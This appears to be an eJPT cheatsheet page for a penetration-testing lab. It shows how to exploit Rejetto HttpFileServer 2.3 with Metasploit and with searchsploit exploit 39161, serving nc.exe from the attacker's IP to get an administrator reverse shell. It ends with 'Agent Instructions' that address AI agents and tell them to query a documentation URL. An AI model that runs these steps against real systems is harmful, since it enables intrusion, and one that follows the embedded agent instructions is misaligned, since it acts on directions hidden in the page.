# HttpFileServer httpd 2.3(Rejetto)

## #Enumeration

```
nmap -sV -p 80 10.4.19.119
```

```
80/tcp open  http    HttpFileServer httpd 2.3
```

## #Exploitation

```
search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, LHOST ,LPORT if necessary
exploit
```

<figure><img src="/files/sVkmZ3UkkAQOF68DinV1" alt="" width="563"><figcaption></figcaption></figure>

After running this module you will get your meterpreter session

## #Manual Exploitation

```
nmap -sV 10.2.23.79
```

```
80/tcp    open  http               HttpFileServer httpd 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

* Use `searchsploit` to identify `HttpFileServer httpd 2.3` vulnerabilities

```
searchsploit HTTP File Server 2.3
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-6c4ba1c4ff580bb8a319f39572e9a43113289759%252Fimage-20230423132333200.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=3c27bd775477349ee7e31c53e8648564580a143fabe67c44f95b633b9cf0f9dd" alt=""><figcaption></figcaption></figure>

* Copy the exploit to the Desktop

```
cd Desktop/
searchsploit -m 39161
```

#### Analyzing the Exploit <a href="#analyzing-the-exploit" id="analyzing-the-exploit"></a>

```
vim 39161.py
```

<figure><img src="https://blog.syselement.com/~gitbook/image?url=https:%2F%2F1996978447-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FlhjuckuLbvBn36EoFL7P%252Fuploads%252Fgit-blob-4ee2cb99dc93186e03c6e15159878a8adb376094%252Fimage-20230423132623415.png%3Falt=media&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=15190e632fc321542a90c8e08cc6b600951fadd5394d55ab255bd6426ec5c501" alt=""><figcaption></figcaption></figure>

* Read the exploit
  * *You need to be using a web server hosting netcat (http\://\<attackers\_ip>:80/nc.exe). You may need to run it multiple times for success!*
  * `ip_addr` - change to attacker Kali Linux IP
  * `local_port` - change to 1234

#### Execute the Exploit <a href="#execute-the-exploit" id="execute-the-exploit"></a>

* Save and run the exploit

```
# In a new terminal session
cd Desktop/
cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80
```

```
# In a new terminal session
# Run the netcat listener on the exploit specified "local_port"
nc -nvlp 1234
```

```
# From the first terminal windows, run the exploit
python 39161.py 10.2.23.79 80
```

```
whoami
	win-omcnbkr66mn\administrator
systeminfo
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/exploitation/windows-exploitation/http/httpfileserver-httpd-2.3-rejetto.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.